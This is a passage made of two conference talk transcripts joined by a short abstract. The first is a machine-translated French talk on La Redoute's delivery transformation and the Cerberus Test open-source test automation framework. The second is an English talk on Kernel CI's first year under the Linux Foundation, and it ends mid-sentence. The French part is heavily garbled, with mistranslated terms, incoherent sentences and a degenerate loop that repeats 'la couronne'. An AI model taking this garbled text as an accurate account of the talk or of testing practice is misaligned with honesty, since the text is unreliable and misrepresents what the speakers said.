avons aussi ouvert 50 store-cournage, la galerie Lafayette, etc. Maintenant, nous sommes un partenariat de 51 %. Nous avons déjà partagé un peu de ce que la Redoute était, et c'est une fois de la question de ce qu'il est, nous avons partagé un peu de contexte sur la compagnie, et nous allons ensuite passer à ces sujets de valeurs, de la délivrer des performances de l'organisation architecturale, pour les servir sur la testée de la source d'opposé, la méthodologie et le framework. 5 ans plus tard, nous avons été transformés dans les impératifs, nous avons été transformés dans la compagnie, et nous avons pu ne pas survivre. Nous avons des transformations de l'API qui sont encore ici. Si je vais de gauche à droite, nous devons accélérer à devenir un joueur digital, et être plus productifs et trouver un nouveau customaire plus rapide. C'était le premier l'API, de 90 %. Nous devons clairement accélérer le temps de collection. Nous avons été très impacif, en termes de cash flow, et nous avons ensuite terminé dans le cycle visu de ce contexte. Nous devons clairement accélérer à ce point, par le facteur de 10, de 2 à 20, de 20 catalogues de l'année. Nous devons également improving beaucoup notre excellent opération, globalement et transversalement, et le top objectif que nous avons, était de s'améliorer de l'élément de 1,5 jours d'autorisation, à 2 heures. C'est-à-dire que si vous mettez un ordre sur le site, et que les items sont disponibles, cela devrait être en train de faire 2 heures plus tard. Nous devons également, globalement, accélérer à pouvoir nous offrir et évaluer un nouveau modèle de business pour la compagnie. Nous avons été impératifs en regardant comment cela a été transmis dans les priorités. Le premier l'a été prêt à accélérer les performances web de l'application pour augmenter notre capacité d'interacte digital avec les clients. C'est ce que nous avons fait dans le boxe ping. Et puis le dernier l'a été globalement lié à l'évolution globale de l'architecture de la compagnie qui accélère pour faire cela plus vite et plus flexible en temps. Nous allons commencer à partager le déliver de la web. Ce qui était notre point de départ, et un peu le step que nous avons fait, c'est que, au premier, sur le gauche, nous avons deux websites, un pour France et un pour l'Université internationale, par rapport aux raisons historiques de comment la compagnie a décidé de s'adresser à l'Université internationale, séparative de France. Nous avons eu un problème, qui était une double spécification et un codé de tous les idées de business que nous voulions faire. À ce moment, comme nous sommes aussi en train de profiter et d'économiser de la scale, nous avons dû choisir une plateforme, quelque chose que aujourd'hui ne pourrait pas être nécessairement vrai. Nous voulions peut-être avoir des spécitudes internationales. À ce moment, nous avons deux choix. Au gauche, c'était comme le côté fait par une agence fanciale en New York. Le autre, il fallait faire plus pour un start-up en Malta. Ce que nous avons fait, c'est que nous avons choisi la 1 de Malta parce que nous voulions être un peu plus dans une compagnie de mindset et en evoluant de cette façon. Nous avons fait, pour d'autres raisons, mais globalement, une décision pour ces raisons. Nous avons fini par pouvoir avoir une implementation singe des changements de business, et avoir seulement une plateforme pour le site mobile et le site web. Et après, nous avons fait aussi une grande convergence pour avoir un site mobile qui est le 1er 100% responsable, pour également augmenter notre capacité d'accélérer et de scale notre implementation des idées de business. Mais ce qui s'est passé, typiquement, quand nous commençons par là, nous avons vu sur le top le tout typique step du cycle de développement de la software. Nous avons eu une longue vie de cycle de QA et de U18. Et ce qui s'est passé après ce cycle de test, c'est que nous avons trouvé des bugs qui ont besoin de correction et nous avons dû rédouer encore tous ces tests et vérifications, pour peut-être trouver encore un autre type de bug par rapport à la progression, et d'avoir pu, en fin de compte, pouvoir dédiver de valeur au business 3 mois plus tard. Nous avons fait un peu de cause et analyses de cause sur le type de choses que nous avons pu avoir. Nous avons évoqué cette décision de U18 avec des tests manuels et des tests techniques. Nous ne sommes pas globalement en train de faire le test dans l'arrière. Et puis nous avons eu des grandes et risquées releases qui étaient de la cacadine de ce problème. Nous avons donc récolé les changements, les branches, les merges, parce que tous les tests étaient slow. Nous avons donc eu ce type d'accident, la complexité. Et puis, par ce problème, nous avons également généré un autre type d'environnement inconsistant, complexe de base et de bugs indirectes, parce que tous ces problèmes ont été les premières. Donc, ce que nous avons décidé de donner, c'était le point de slow U18. Et à ce point, nous avons décidé de passer pour les plus petites et plus vite les releases. Et nous avons focusing sur les 4 pillars. La première, c'était la automation de test fonctionnel. La deuxième, le développement de train, je vais expliquer un peu plus ce qu'il est après. Et aussi, les tests de feature flags, et puis, pour le corrélation, pour pouvoir délivrer un increment de valeur interrétale, comment travailler avec le business pour avoir un increment de feature et de spécification. Donc, ce que ça veut dire, en termes de ce que nous voulions acheter, sur la partie de la partie de test fonctionnel, nous voulions vraiment avoir confiance pour délivrer les changements de Ux. Cela signifie que nous devons pouvoir automater tous les tests de slow, répétitifs, tous les tests de test de manual, et donc, si nous voulions automater, cela signifie que nous devons être bons à un test de réutilisation, de la montabilité et de la compétition de la compétition. Le autre point que nous voulions adresser était le temps de la première fois. Il fallait aller plus loin pour un modèle de développement de train. Il devait s'adresser à des traitements, comme la limiter le travail en progress. Il devait avoir des petits changements en passant à la production et le principal objectif, c'est de remettre tous les branches et l'élection complexe. Donc, en fait, en faisant une longue cycle de Ux avec un nombre de changements, nous devons donc avoir besoin de branches pour qu'on puisse s'adresser à des changements. Nous voulions aller plus loin avec des petits changements. Et ensuite, pour pouvoir réutiliser la production, nous avons pu mettre sur le modèle de feature des partenaires de test de réutilisation. Le point de la question était de pouvoir déployer le déploiement de l'activation et de pouvoir évoluer la flexibilité et le développement graduel, par exemple, 1%, 25%, 50%, 100%. Et de pouvoir aussi avoir de l'air un feedback graduel avec le business de l'avenir et de pouvoir réutiliser et rééterrir si il ne faut pas. Et le dernier point était clairement de changer le mindset, de dire je ne travaille pas dans 3 ou 6 mois ou encore plus de projets de la scale. Je peux réfléchir sur cette scale mais je dois pouvoir définir des petits changements, des petites spécifications et des petits tests que je veux faire sur le site et mes expériences customes. Donc, c'est le plus important de pouvoir couper les grandes idées dans des petites idées que vous pouvez, alors, déployer et évoluer une hypothèse et des points de données. Donc, ce que nous avons fait, si nous regardons le point de vue de notre scheme, est que nous avons regardé les procédures et nous avons décidé de mettre le développement de traitement au corps du processus de développement et puis nous avons implémenté dans le pattern shift F, la automation de test fonctionnel et le test de flight et de test de test et des spécifications de l'explication. Nous avons défini le processus fixé donc tous les développeurs ont eu jusqu'à 11 an pour définir le scope et pousser leur développement au tronc et ce n'est que ce qui est dans le tronc que vous pensez. Nous avons ensuite deux heures de faire le UAT avec tous les tests automatisés et qui peuvent être complémentés par le test explorateur et le test manuel. Et puis, ce qui serait validé serait de aller au processus de déployement. Et puis, nous avons également voulu de produire, nous avons voulu actuellement aussi avec un test de flight et de flight pour l'activation et des désactivations si nous avons besoin de ça. Et nous avons aussi un processus fixé qui a été défini pour un processus de l'exception qui est assez important pour ne pas avoir un bloc si vous avez une exception, après. Les résultats que nous avons managés depuis cette pratique, c'était vraiment que nous... Comme vous l'avez vu, c'était un peu de temps pour évoluer ces processus. Et ce que nous ne voici pas ici, c'est le nombre de fictérations que nous avons fait et que nous avons appris à pouvoir évoluer. Mais maintenant, depuis 2020, nous sommes à plus de 6500 tests automatisés qui se sont déployés et nous sommes prêts à déployer une confiance et une très high rate d'accès aujourd'hui, parce que nous avons managé de beaucoup de tests automatisés. Et ici, maintenant, nous avons voulu partager ce que nous avons fait pour l'implément de ces tests pyramides. Nous avons fait des choix parce que nous avons aussi des ressources limitées, des efforts disponibles. Comme nous avons regardé la plateforme e-commerce qui est principalement liée à des expériences digitales et des expériences utilisées, nous avons fait deux décisions, c'était de focussuer sur le test fonctionnel, sur les deux maines, et pour déployer des journées customaires. Et aussi des features componentaires, par exemple, pour faire un tout set de tests de utilisation de des componentes de UxCase et puis, nous avons retenu des textes uniques, surtout pour la architecture de code, donc cela signifie que nous avons accepté un test unique pour ne pas faire tout le test de utilisation de UxCase parce qu'ils étaient faits par un layer de nôtre. Et aussi, les tests de intégration, nous réduisons pour les minimum stricts par exception parce que, en fait, comme nous avons fait de bons tests fonctionnels, de tests de test de fin et de fin, nous n'avons pas besoin de faire un test additionnel d'intégration, il sera dupliqué dans un overlap ensemble. Et puis, pour le test manuel, nous pouvons seulement explorer le test sur le top et un peu de tests manuel pour qu'on automate l'autre. Et comme vous voyez, ce n'est pas nécessairement le pattern traditionnel que vous pouvez voir, mais quelque chose que je veux partager un peu plus tard c'est que nous sommes un peu capables d'exprimer la question de normalisation, que les tests fonctionnels test et web et UxCase test soient slow et non maintenables ou au moins complexes pour maintenir donc vous devez avoir avec eux un test préféré. Mais ma conviction est que si vous designz des tests de bad unit, ils sont aussi vraiment complexes pour maintenir. Et si vous pouvez exécuter votre test fonctionnel en parallèle avec la vitesse etc. ils peuvent être vite et si vous aussi les designz bien, ils peuvent aussi être très maintenables. Donc, encore, je pense que nous sommes prêts à challenger un peu l'assumption au-delà de le model de test pyramid. Parce que si nous nous regardons bien, peut-être que nous pouvons trouver une meilleure solution pour votre contexte particulière et l'objectif. Donc, et puis, je veux un peu après, que nous voulons vraiment le processus de développement de la vie, mais après que nous avons un chose qui va dans la production. Et pour exemple, ici, c'est ce type de dashboard que nous avons utilisé pour faire des tests fonctionnels en production. Et ce sont les tests exacts que nous avons réunis dans le test non-régation. Le plus différent est que c'est un subset de notre test intérieur, parce que nous ne devons pas les aller tous. Nous devons faire le premier tour de customers pour chaque pays. Et puis, ils sont en train de se passer sur une base régulière, en fait, sur un campagne base pour les non-régations. Donc, si nous nous prenons un exemple, un simple, on a une page de logins, de traitements, de tests, ils se voient en desktop, mobile site et application, chaque minutes, tout le temps, chaque 5 minutes, et ce que nous regardons, c'est le service kis et le service objectif, donc, est-ce que vous allez bien? Et n'importe quelle dégradation ou la acceptance en termes de le temps en réponse et l'exécution des test et de la journée customer? Le principal bénéfique de doing that, c'est que ça peut augmenter la collaboration de la business-and-IT, parce que nous nous faisons des Ils se sont rendus sur des sites mobile et sur l'application, chaque 5 minutes. Et ce que nous regardons, c'est vraiment le service SQI, donc est-ce que c'est bon? Et la dégradation ou la acceptance en termes de temps de réponse et de l'exécution des cas de test et des journées customaires. Le principal bénéfice de ce travail est que ça improve beaucoup la collaboration de la société et de l'IT parce que nous avons des communs KPIs et de l'fact et ça nous aide à augmenter l'intérêt et la transparence. Parce que c'est comme si nous avons un ennemi commun et ce n'est pas comme si nous parlons de différentes langues et nous avons différentes opinions. Comme nous avons besoin de faire notre test de régulation sur un test régulièrement basé chaque minute, si ce n'est pas bien fait, nous avons beaucoup de fatigue et les gens ne regardent pas l'alerte. Donc c'était un requin pour les tests très stabilisés et réellement automatisés. C'était aussi un point très bon de cette implementation. Et aussi, nous pouvons avoir le temps de réduire de la durée de notre NTT et NTTR parce que les tests sont aussi très bien produisables. Nous avons une histoire, nous pouvons voir exactement ce que sont les procédures qu'on veut faire et nous pouvons les répliquer assez vite si nous avons besoin d'un contexte qui est en train de se faire. Donc je dirais que si je veux utiliser le buzzword, nous parlons de test en production, etc. ou de continuous test, mais c'est vraiment un point très important de la faire couper et de faire surement que les gens sont concentrés sur la production de la production de notre software et mon business digital, et pas seulement en concentrant sur la cédure de la optimisation, comme la automation de test ou les tests de unités ou le développement de développeurs et des gens. Donc un petit chien sur ce que nous avons adressé sur la partie architecturale, qui est vraiment la clé sur cette partie. Donc le résultat que nous avons mané en adressant les questions structurelles sur lesquelles nous pouvons clairement accélérer les idées et les idées de la production de la production. Nous pouvons avoir reçu tous les jours, donc des gros changements de la vie que nous venons de relier tous les deux à quatre semaines. Et nous pouvons aussi réduire le temps de cycle de QA ou de test de cycle par deux semaines à deux heures, donc aussi un grand improvement pour nous. Et maintenant, ce que nous sommes en train de regarder est d'optimer encore un peu et réduire le facteur de la limiter. Donc ce que nous avons en termes de facteur de limiter, si nous regardons le top, est que sur la partie organisationale, nous avons un facteur de limiter de l'organisation qui ne se démarre pas. Donc c'est ce que nous regardons à réactiver et à réactiver un micro-frontier pour pouvoir éterrir beaucoup plus vite sur les idées parallèles basées sur l'expérience et les journées de customer. Et puis le second point est que notre campagne de tests automatique se dévouit pendant 40 à 60 minutes, donc nous voulons pouvoir le dévouer pendant 5 minutes ou quelque chose comme ça, pour pouvoir avoir multiplié, déployé par jour et augmenter encore notre temps de cycle de déployement. Et puis pour l'analysation de notre test, etc., nous regardons en explorant des statistiques machine-learning, technologies AI, pour pouvoir réduire les timings. Mais en fait, encore une fois, nous devons focusser sur le facteur de limiter et ils sont vraiment, par l'ordre d'importance, l'architecture de notre organisation et le système et l'exécution de campagne. Alors que les autres parties sont plus pro-eutiques, mais encore plus importants de regarder, spécialement pour le test froquis et l'autocorrection et le ressenti de la test. Qu'est-ce qu'on a à propos de l'adresse sur le port organisational et ce que je peux partager en termes de pratiques, est que nous avons réveillé au niveau de la majorité de la standard, donc commençons avec l'aide, obtenir des expertises textes et obtenir les automations initiales et les rightes de la tournée, donc ne essayez pas de implémenter beaucoup de automations et de tournée du début. Le but du premier coup est de avoir un processus répétable que vous pouvez déterrir. Et quand vous commencez, vous devez adresser le port organisational et les compétences, l'exécution, etc. Et le 6e temps, vous devez éloigner les gens ou vérifier l'internaire de la nouvelle position, il faut intégrer dans votre système d'éco-système, l'intervention, etc. Et vous devez aussi avoir le temps pour les gens de se faire entraîner bien à ce que ils le font. Et le pattern typique que nous avons vu et qui est implémenté, c'est de l'aider de la qualité sur les deux business et le site 90, et aussi formaliser comme le centre de l'excellente pattern ou le test, le training et le modèle de centre. Quand vous avez quelque chose robuste, vous devez pouvoir déployer plus grandement le premier practiceur pour pouvoir évaluer cet modèle avec un plus décentralisé, donc vous arrêtez un peu pour avoir un plus centralisé la validation et ensuite vous pouvez décentraliser une série de décisions qui sont en train de se faire plus en reposant des décisions postes par les gens. Et quelque chose que vous pouvez faire, par exemple, c'est de avoir un manager digital ou leader par l'arrière de votre produit. Vous pouvez aussi avoir un test directement inclus dans le team de fonctionnement et animer avec le comité de practice. Donc, c'est un type de pattern typique que nous avons vu et qui l'implémentons. Et maintenant, si je vous ai un peu dans toute cette journée, nous avons implémenté le framework de la automation qui est maintenant l'open source et la testée. Donc, je vais vous partager un peu sur ce que c'est, etc. Maintenant, parce que nous avons vraiment construit sur cette présentation et c'est ce qui est le le fameux tooling que nous devons interroger avec notre organisation et le processus. Donc, dans le premier lieu, pourquoi nous voulons développer une solution pour faire des tests automatique? Je pense que c'était clairement une question importante pour répondre. C'est que nous avons besoin de tests automatique parce que nous devons accélérer le cycle temps. Nous n'avons pas de ressources pour faire manuellement. Et même manuellement, avec beaucoup de monnaie, il ne sera pas possible d'y arriver le niveau de temps de cycle que nous voulons. Donc, nous devons avoir un test automatique. À ce temps, nous avons regardé, c'est plus que 5 ans plus tard, il n'y avait pas vraiment une option viable. Donc, nous allons dire que la solution existait, n'était pas vraiment bien. Donc, vraiment, c'est le cas entre le test de l'exécution, l'exécution des tests, le test de l'exécution. Et les uns qui existaient qui étaient un peu utilisables étaient vraiment costants. Et nous n'avons pas les ressources pour imprimer. Donc, nous avons eu une preuve de raison pourquoi nous avons décidé de aller pour imprimer notre propre framework test. Comment cette idée est-elle réalisée? Nous nous faisons aussi de la production et de l'application de celles-ci. Nous nous avons focussé sur 3 types de tests que nous voulions faire, un test de full stack ou de test web. Donc, test web, API et de la date. Nous voulions, pour exemple, nous voulions pouvoir vérifier sur le database ou API, etc. Et notre respiration de la nom, mais ce n'était pas ce que nous avons appris depuis le début. C'est vraiment de la mythologie grecque, donc Cerberus, parce que c'est un 3-id, donc Cerberus, maintenant, est capable de faire beaucoup plus de tests, comme mobile application, desktop, etc. Et nous voulons aussi liker la idée parce que c'est le gardien de hell. Donc pour nous, ça signifie que c'était le gardien de notre production système. Donc, c'est pourquoi nous voulons liker les idées de Cerberus, et nous avons réalisé le test en fin de la fin pour être plus clair que c'est un framework test. Donc, le problème qu'on voulait se solver avec Cerberus Test, c'était de s'interroyer rapidement entre la définition de tests, de l'exécution et de la réportation, dans un moyen commun et collaboratif entre les variés des gens et des doigts qu'on voit sous-bis. Donc si nous commençons sur le top, ce sont des entreprises et des producteurs qui veulent définir leurs tests, faire le test management, planer, test, etc. Et nous voulons avoir des automations et des ingénieurs qui font le test design et des tests de production pour les équipes, puis le test exécuté sur une base régulière dans la production et dans les réalisations. Et nous voulons avoir une réportation, une exécution, une analyse, une analyse, etc. Nous devons aussi avoir des gens qui collaborent pour préparer les relations de dataset et de la data management. Et puis, quand nous allons aller vers le pattern CIC et le développement de l'intégration, etc. Nous avons aussi besoin de cette sorte de collaboration avec le team de production, de développement, et de cette sorte de personnes. Donc, ce que nous avons implementé dans le toulon et de la façon dont ça fonctionne, c'est que nous avons vraiment refusé en déployant les éléments nécessaires de ces loophes. Donc, nous avons refusé de avoir un commun et collaboratif test repository directement dans le toulon. Donc, pour avoir une description dans les langues business et languages. Et pour pouvoir composer les tests avec le libéral de la étape, action et contrôle. Et nous allons aussi utiliser le keyword de la test de test pour pouvoir être un code simple et low-code, test framework, pour pouvoir être pour quelqu'un qui est business pour décrire le test en anglais sans savoir n'importe quoi sur sa technique de implementation. Mais juste après, quelqu'un d'un QA ou de un QNL peut venir et implementer le keyword que le business a défini et puis, lui-même, il faut utiliser le code en rebouillage pour le reste de la team. Et ce que nous allons faire à la droite, c'est que nous voulons avoir une automation pour les plus grands cas de utilisation. Donc, ce que nous avons implementé, nous avons réalisé que nous voulons vraiment utiliser une solution de construction qui peut s'éteindre. Nous utilisons la solution d'opensure. Donc, pour la web, nous utilisons un driver de salinium. L'application mobile est basée sur un appion, une integration de desktop avec SQL. Nous sommes capables de tester un API sur le software, GraphQL, Kafka et des files, etc. Et puis, sur la gauche, ce que nous pouvons faire en relation à la base de données, nous pouvons faire vérification dans le test si une certaine data est présente dans la base de données. Mais nous pouvons aussi utiliser un framework de test data pour pouvoir utiliser la base de données spécifique, de libéraire, de CSV, d'application, de base de données, etc. Pour avoir un test de données dans notre test que nous avons utilisé, nous pouvons définir, par exemple, une propre property de test. Il faut être dynamique. Donc, pour chaque case de test, dans le contexte spécifique, il devrait être différent. Donc, nous pourrons voir, par exemple, une fonction. Et puis, la dernière, nous voulons avoir ceci pour pouvoir pour les gens, pour qu'ils veulent définir leurs tests, et configurer, les dégager. Ils ont le reportage natif dans le toulon pour ne pas avoir un autre toulon, ou un format html, etc. Et pourquoi nous voulons faire ça, c'est pour pouvoir avoir l'advance de transabilité, répliquer, un vidéo, et tout ce type de requimement, incluant aussi, nous avons aussi test reportage et test analytics, donc, ou la période de temps. Et nous voulons vraiment tout cela être disponible. Et c'est pourquoi nous avons décidé aussi pour servir le test pour être disponible dans un interface web. Donc, une autre information est que c'est disponible sur GitHub. Nous avons plus de 6 000 commissions et environ 30 contributaires aujourd'hui. C'est 100 % d'open source et il y a 3 plans disponibles, demos, etc. Et nous avons une communauté active sur Slack et GitHub, et il y a une série de documentations disponibles qui sont très importantes. Nous savons pour un projet open source, ou au moins aucun projet si nous voulons avoir des gens et des interactions. Et ce que vous voyez en bas, c'est le type de compagnie que nous utilisons, donc le premier est plus linked avec des compagnie de retail donc que nous avons des shops ou des stores digitaux. Et plus recentement, nous avons des joueurs pour plus d'autres industries, par exemple, ici, la industrie de la médias avec la TF1, qui est un peu comme un Netflix, une plateforme de vidéo streaming mais en France pour un canal de TV main. Donc, merci pour votre temps. Je suis vraiment heureux de vous parler avec vous à Faust Dem. Donc, si vous aimez le talk et vous pouvez partager avec moi sur LinkedIn, etc., mais je voudrais que si vous aimez le projet, vous pouvez toujours faire un star en guitare, un peu toujours nous aider. Donc, ici, je suis heureux de vous poser des questions. Merci beaucoup. Merci. Vous avez dit que vous avez mis un softwares pour les releases de la future, et vous vous demandez si vous voulez un peu plus de ceci. Non, je sais pas. Je suis juste différemment un front, enfin, c'est une plateforme front et le back office. Parce que, en fait, c'est un contexte très différent. Mais non, ce que j'ai mis dans l'enquête c'est que, en deux cas, nous avons commencé simple avec la code de la configuration de la film. Et puis, quand nous sommes un peu plus matures, nous avons accéléré avec le tooling, parce qu'on a commencé trop de des flashs pour un x-mod de la case sur le web, où nous avons beaucoup plus de fonctions dans l'habitacle simple. En fait, le back office est beaucoup plus plus simple et aussi plus plus de component individuel. Donc, ici, nous avons plus de compétition. Ok, merci. La prochaine question est de Nacho, un de nos préméliques. Si je comprends correctement, vous faites un test plus fonctionnel que le test de unité. Comment vous êtes sûrs que tous les cas de la couronne et différents scénarios sont coulés? Je pense que ces tests seront plus difficile de maintenir comparé à un test plus isolé ou plus unité. Et aussi, ce qu'est-ce que vous essayez de trouver un bug? Parce que vous vous en avez plus de tests à niveau à l'extérieur, ce sera un peu plus difficile de trouver où est le problème, versus si vous vous en avez plus de tests à niveau bas et que vous pouvez simplement identifier un problème. Qu'est-ce que vous vous en avez prévenu? Oui, c'est une question intéressante. En fait, pour nous, nous avons fait des choix parce qu'on n'a pas un facteur de la vieille. C'était que notre plateforme de la couronne et c'est encore un peu comme ça aujourd'hui. C'est comme un plan de la couronne. Ce n'est pas un seul monolithe, mais je dirais que il y a trois grandes applications à la couronne. Donc ça veut dire que nous avons trois grandes components pour le faire. Et l'issue que nous avons est de la question de la question de la couronne. Et donc, nous avons un peu de problèmes sur la régression de la couronne et plus ou moins sur les fonctionnalités. Parce que, en fait, beaucoup de fonctionnalités sont en train de réunir les services de la couronne qui sont au-deau de la couronne. Nous faisons le test de la perspective de la couronne, mais nous ne faisons pas le test de la couronne de la couronne de la couronne et de la couronne de la couronne. Donc c'est pourquoi nous avons mis un effort sur les tests fonctionnels. Parce que, si nous faisons trop de tests, en fait, comme c'est une plateforme de plateforme de la couronne, ce n'était pas très efficace de les performer, parce que les components ne sont pas assez modulés à l'intérieur de la plateforme. Donc c'est pourquoi nous avons fait le trait de l'offre pour mettre un peu plus de accès sur les tests fonctionnels. Il y avait aussi une choisie pour être beaucoup plus collaboratif avec le business. Parce que avant ça, nous faisions beaucoup plus de tests de la couronne. Et il y avait très près, même pour les testers, c'était très difficile de s'accepter. Donc c'est pourquoi nous avons choisi de faire ça. Et puis en termes de maintenance, pour moi, et la coverage, pour moi, ça dépend vraiment de comment ils sont faits, parce que dans les tests unis, oui, nous pouvons tester une variété de tests de la couronne. Mais je dirais que dans les tests fonctionnels, nous pouvons faire le même. Donc c'est ce que nous avons décidé de faire, nous avons investi dans les tests fonctionnels sur le site. Et ils sont performant l'exhaustivité de la couronne. Et dans les tests de la couronne, dans les tests de la couronne, nous avons testé les tests fonctionnels de la couronne, nous avons testé les tests fonctionnels de la couronne, nous avons testé les tests fonctionnels de la couronne.
Cerberus, in reference to the Greek mythology of the three-headed god, guardian of Hell, was the name given to the internal testing automation solution we decided to build internally in 2011. At that time, the ecosystem of existing solutions, being commercial or open source, was not fulfilling our requirements for end-to-end functional testing. In this article we will explain how our internal solution evolved from a Proof of Concept to a broader deploy in other major companies, to perform Continuous Delivery, Continuous Testing and Monitoring at scale.
10.5446/52810 (DOI)
Hello everyone, Kernel CI has passed the test. Now what does that really mean? If you're not familiar with the project already, Kernel CI is a system for testing the upstream Linux kernel and also for collecting results from other CI systems. And a year ago it joined the Linux foundation. So the first year as a member of the Linux foundation has been quite successful for the first year. We still have all the initial founding members, member companies, they've renewed the membership and there's been some good feedback overall. We've achieved a lot of the things we wanted to do for the first year. We've started reading more functional tests and we've engaged with many other CI systems via the KCI DB project to gather results together, to collect some results into a common place. We've learned more about the kernel community's needs, so basically what the kernel community expects from a project like Kernel CI. We've also improved how to maintain the project and how to have development workflows for the project itself to make it easier for new people to join in and contribute. One thing we failed to do was to produce some stats about the impact that kernel CI is having on the kernel quality. That is something we'll hope to do better in order to start doing really in 2021 with some new metrics. Now we're starting to have more results. We can use the data to actually draw a real picture of the impact of the project. Joining the Linux Foundation has had a big impact on the project, of course. So now we have an annual budget from the membership fees, which we haven't been using too much yet, but it gives us an opportunity to grow the project in new ways. We also have cloud compute resources from Google and Microsoft Azure, so we're using that to build kernels and we'll be using it to run more tests. That has solved a lot of the bottlenecks we had before. We also identified the fact that we need to keep running tests initiated by kernel CI itself, and that's what we call the native tests. But at the same time, we need to collect results from other existing CI systems into a common database and the external ones are getting collected by KCI DB. Now we've also seen a great number of contributors in the project from new horizons, new companies, new individuals. And that I think is a direct effect of kernel CI being more established and accepted as the project that will really lead the way for upstream kernel tests. So on this slide, you can see what has happened in the first year of kernel CI as a Linux Foundation project. So it started in October 2019 when this was launched during the UBERD Linux conference Europe. It took a few months to set things up and organize the board and define how the project would work and set up the budget and do things like that. In the end, we came up with a mission statement to basically explain that kernel CI is there to improve the quality of the upstream Linux kernel. That was mentioned at FOSDAM last year. And I can say that a lot of things have happened since then and things have been growing pretty much as we would have liked it to happen. So since then, we've come up with a new prototype web dashboard for a KCI-DB project. That's where you can see the collected data from other CI systems as well as the native kernel CI ones. So that's running in parallel to the main web dashboards we have on kernel CI.org. Then in March, we started using Microsoft Azure servers for hosting all our services. So the main website and all the infrastructure was previously hosted by servers donated by companies interested in kernel CI. So it was always a bit... It was not very sustainable because it was hard to expand and hard to maintain and all the servers were a bit different. And then having this really helped us with the Microsoft Azure servers to have a sustainable project. And then kernel CI had been doing builds and boot testing for a long time and that was kind of the reputation of kernel CI that it was like boot testing. Now in April and May last year, they started really to change when the web dashboard on kernel CI.org was improved to show functional test results and non-shared boot results. And since then, we've kept adding more and more tests to the native test systems. Then in May and June, we conducted a community survey to learn more about the kernel community and how to really address the needs of the kernel community. I'll come back to that in detail a bit later. And then we started using Kubernetes for doing kernel builds. So using cloud VMs from Google, computer and Microsoft Azure. And this has really helped scale up the build capacity. And we're planning to also use that to run tests that don't need a physical platform. Then in August, there was an in-explomance 2020 and that was a really important conference for kernel CI being the main upstream kernel conference. And we could really see that kernel CI was in a lot of people's minds and it came up in many different topics. Of course, there was a testing micro conference. So it was very present there, but also it was present in real-time discussions. And since then, actually during the week of Plumbers, we started running real-time tests in kernel CI. It was also mentioned in tool chain. So we've improved. We're also doing Plumbers, we improved how we test building the kernel with Klang, an LVM Klang. We also discussed how to improve a KCL test support and many other things. So kernel CI was really present almost everywhere. Not really as a main topic for Plumbers, but you could see it was becoming part of, part of the community in a real integral way. And then after that, also we started receiving results from Google Sysbot into KCI DB. That was really an important milestone because it was the first real external contributor to KCI DB. Initially, we had CKI which started from Red Hat, which started contributing right at the beginning of KCI DB. This KCI DB was in great, to a large extent, a Red Hat project. But also the kernel CI native tests were being added to the database. So having Google Sysbot was really a big milestone to show that we could also have other CI systems contribute to KCI DB. Since then, we've started making, we've made good progress with all this as well. And that was in September, so it's already a few months ago. I wanted to just focus on the first year, but things have carried on happening since then. So basically we have a growing ecosystem. And by ecosystem, I mean the kernel ecosystem as well as all the things related to testing around the kernel. So we can look at it from the point of view what testing actually is being done on the kernel. So that's what we can call the kernel testing landscape. It's very segmented basically. You have individual contributors, individuals like developers and maintainers who would run their own tests that define themselves typically. Or if they are part of an organization, it might be the test system from their organization. But they'll do what they have at their own disposal, what they have locally. Basically they will tailor this to really match their needs for their day to day work. Then you have organizations like Distributions, OEMs and SSE Vendors. So in this case, the kernels would be tested in a more extensive way, but also in a more vertical way. So it will be testing only with distro kernels for example. And the test will be pretty much trying to test the features of the distro or of the product if it's for a phone manufacturer or a server provider. It will be or whatever uses Linux. Linux is tested all the time on all these products, but in a very specific way to make sure that the product works, not just the kernel. And similar things happen with CPU, Vendors and SSE manufacturers. Slightly lower level, but still make sure that it works on their platforms. And of course all these things make sense for each individual organization, each individual developer. But none of these are really testing the kernel for what it is or in its entirety. And that's not really possible either. But then you have some more general projects like Intel Zero Day, which try to build and test all the kernels. So there's many kernel builds are made by Intel Zero Day for different architectures. And basically it's about building and testing patches from the mailing list, which is really helpful and provides a really short feedback loop. But the actual tests are typically only run on Intel x86 because it's an Intel project. So that's what makes sense for Intel and the platforms they have and the focus they have on. Then you have a different way of testing the kernel in a general way with the fuzzing. So like Syscaller and the Syspot service, that's about fuzzing the kernel with system calls. So it's a very generic way of testing any part of the kernel. But on the other hand, you can't do just that. You also have to do functional testing to find different kinds of problems. So all these things all add up basically to the full picture of whether a kernel is good or not. And pooling them together is the mission of kernel CI. Now, on this picture, I guess it's a familiar typical example of what test-driven workflow really looks like. But I think for the upstream kernel, while some of that is happening, I think it's not really part of the kernel development itself. It's more like an asynchronous system where you have the kernel development happening at its own pace. And then you have some test systems working in parallel at their own different pace. So for example, you have contributors who contribute to the kernel code and to the tests to some extent, in some cases both, because you can see on test and Kugnet are hosted directly in the kernel tree. Then when new changes are made, of course, you have the infrastructure building kernels, running the test feeds as well, and running the test and processing the data, and generating reports, finding regressions, all that kind of processing, and then sending notifications by email and web dashboard to the contributors. Now what you can, in an ideal CI system, a change would need to pass some tests before it's accepted, before it's merged in the main branch. And we don't really have that in the upstream kernel at the moment. So I think maybe for stable releases, there's an implicit expectation that, because you have some systems that test stable kernels and they send some reports, so you would expect normally for stable release to have actually waited for the results to come in before the release was made. I don't think there's any written agreement about that. You don't have a stamp on each kernel release to say this has passed all these tests. You can only assume it's the case. So if one CI system was down, was not or disappeared, or for some reason stopped testing a stable branch, I'm pretty sure this table release would happen anyway. There will be some questions like what's going on, but it wouldn't be blocked by that. Unlike, you know, if you use GitLab, for example, you set up the workflow so that each patch has to pass some pipelines, pass some tests before it gets merged, then if you don't have tests, you don't have, the patch is not merged typically. That's a hard requirement. And we're quite far away from that in the kernel development. And it's especially true for the changes that land in the next next or even in mainline during the merge window. Basically the expectation is that if everything gets turned together, people will test it at their own pace and report problems. And gradually with each release candidate, you would expect less people to report problems or all the issues to have been fixed. But in the end, you don't really have a positive confirmation that things are working well. You just assume that because nobody's reporting any issues anymore, that it should be fine. And I think that works because nobody is really using directly a mainline kernel or even stable kernel in a product. So then people will be testing that anyway as an integrated product, not just for the kernel itself. And basically having some quality metrics directly from upstream kernel and stable releases is what kernel CI is about. So then that means it would remove some duplicated efforts for all the OEMs, all the people or even distros, all the people reusing the kernel in a real environment. It would remove some of their testing effort because they could already rely on what has been tested upstream. That's something that can't really be done right now. So then to understand a bit better how to make a CIO work for the community, we made a survey. So as I've just explained what the ecosystem is, the ecosystem is basically all the different players interacting with each other. So people contributing, maintainers and people using it in products, people making tests. But all these people are part of a community. So the survey showed some interesting results. So the 